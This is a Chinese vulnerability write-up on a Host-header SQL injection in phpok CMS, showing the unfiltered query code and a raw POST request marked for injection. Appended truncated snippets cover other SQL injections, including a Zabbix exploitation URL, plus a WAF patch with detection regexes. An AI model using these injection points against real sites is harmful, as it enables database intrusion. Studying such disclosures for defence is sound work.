【原创】phpok一处SQL注射

看文件 :/framework/model/www/site_model.php 66行

估计主机头注入很少能发现。

在多处调用了我们就直接拿留言板处测试。

public function get_one_from_domain($domain=‘‘) { $sql = "SELECT site_id FROM ".$this->db->prefix."site_domain WHERE domain=‘".$domain."‘"; //未过滤就进库 $cache_id = $this->cache->id($sql); $tmp = $this->cache->get($cache_id); if(!$tmp){ $this->db->cache_set($cache_id); $tmp = $this->db->get_one($sql); if(!$tmp){ return false; } $this->cache->save($cache_id,$tmp); } return $this->get_one($tmp[‘site_id‘]); } 

提交POST

POST /phpok/api.php?c=post&f=save&_noCache=0.5898166163824499 HTTP/1.1 Host: localhost* Content-Length: 106 Accept: application/json, text/javascript, */*; q=0.01 Origin: http://localhost X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0 Content-Type: application/x-www-form-urlencoded Referer: http://localhost/phpok/message.html?_noCache=0.3242947137914598 Accept-Encoding: gzip,deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: CY_VST_CM=5%7C342919005; CNZZDATA1256279252=2086651609-1450948940-http%253A%252F%252Flocalhost%252F%7C1451011143; bdshare_firstime=1451011761351; PHPSESSID=be7nqluc5jfcthpeq914qtteb1; SOHUCY-VISITOR-LEAD-LOGIN=2 id=message&title=admin&fullname=admin&mobile=admin&email=admin&pictures=&file=&content=admin&_chkcode=1548

时间: 2024-12-10 09:43:25

【原创】phpok一处SQL注射的相关文章

【原创】ourphp一处SQL注射

想起早些年就已经很少玩审计了,后来因为合作方的原因就down了一份源码分析了一些,在很多地方都调用过滤函数.最后在评论一处发现了未过滤的地方,我们看看. <?php /******************************************************************************* * Ourphp - CMS建站系统 * Copyright (C) 2014 ourphp.net * 开发者:哈尔滨伟成科技有限公司 *****************

卖座网一处SQL注射(Http Referer sqlinjection)

漏洞作者: 猪猪侠 漏洞详情 披露状态: 2015-01-13: 细节已通知厂商并且等待厂商处理中2015-01-14: 厂商已经确认,细节仅向厂商公开2015-01-24: 细节向核心白帽子及相关领域专家公开2015-02-03: 细节向普通白帽子公开2015-02-13: 细节向实习白帽子公开2015-02-27: 细节向公众公开 code 区域 GET /?cityId=13&cityName=%E5%B9%BF%E5%B7%9E HTTP/1.1 Host: m.maizuo.com P

Zabbix的前台SQL注射漏洞利用

今年8月份Map在wooyun上发了个Zabbix某前台SQL注射漏洞 ,11月份才公开. 漏洞详情大约是这样的: 在zabbix前端存在一个SQL注射漏洞,由于zabbix前台可以在zabbix的server和client进行命令执行,所以这会导致很严重的后果. 在 /chart_bar.php 的163行代码 获取了一个来自GET,POST,COOKIE的值itemid. $itemid = $item['itemid']; 最后这个参数进到了SQL查询的过程 在同一个文件内的$period

可以有效防护XSS,sql注射,代码执行,文件包含等多种高危漏洞。

http://bbs.aliyun.com/read/137391.html <?php /** * 云体检通用漏洞防护补丁v1.1 * 更新时间:2013-05-25 * 功能说明:防护XSS,SQL,代码执行,文件包含等多种高危漏洞 */ $url_arr = array( 'xss' => "\\=\\+\\/v(?:8|9|\\+|\\/)|\\%0acontent\\-(?:id|location|type|transfer\\-encoding)", ); $a

DVWA系列のSQL注射

SQL Injection(SQL注入) 等级为low时直接抓包放入sqlmap 直接就能跑出来 等级为medium时 SQL Injection (Blind)

Zabbix最新SQL注射漏洞利用

freebuf刚爆Zabbix的sql注入:http://www.freebuf.com/vuls/112197.html 漏洞测试: 爆用户名和密码: http://192.168.1.13/zabbix/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select (1) f

某省农机购置补贴系统旁站SQL注射(泄漏该通用系统源码及信息泄露风险

http://wooyun.org/bugs/wooyun-2014-070849 社工库地址 Social Engineering Data QQ群: https://qqgroup.insight-labs.org https://s3.amazonaws.com/qqqun./index.html(与insight-labs类似) www.weigongkai.com http://qun.594sgk.com/ http://chaxun.langzuwl.com/qun 密码泄露查询

【Vegas原创】查询SQL Server更改记录的语句

指定数据库,然后: select Name,Create_date,Modify_Date from sys.objects where type in ('U','P', 'V','F', 'TR', 'FN') order by Modify_Date desc

dedecms5.7最新guestbook.php文件sql注射漏洞利用 中国寒龙

影响版本为5.7 漏洞文件edit.inc.php具体代码: < ?php if(!defined('DEDEINC')) exit('Request Error!'); if(!empty($_COOKIE['GUEST_BOOK_POS'])) $GUEST_BOOK_POS = $_COOKIE['GUEST_BOOK_POS']; else $GUEST_BOOK_POS = "guestbook.php"; $id = intval($id); if(empty($jo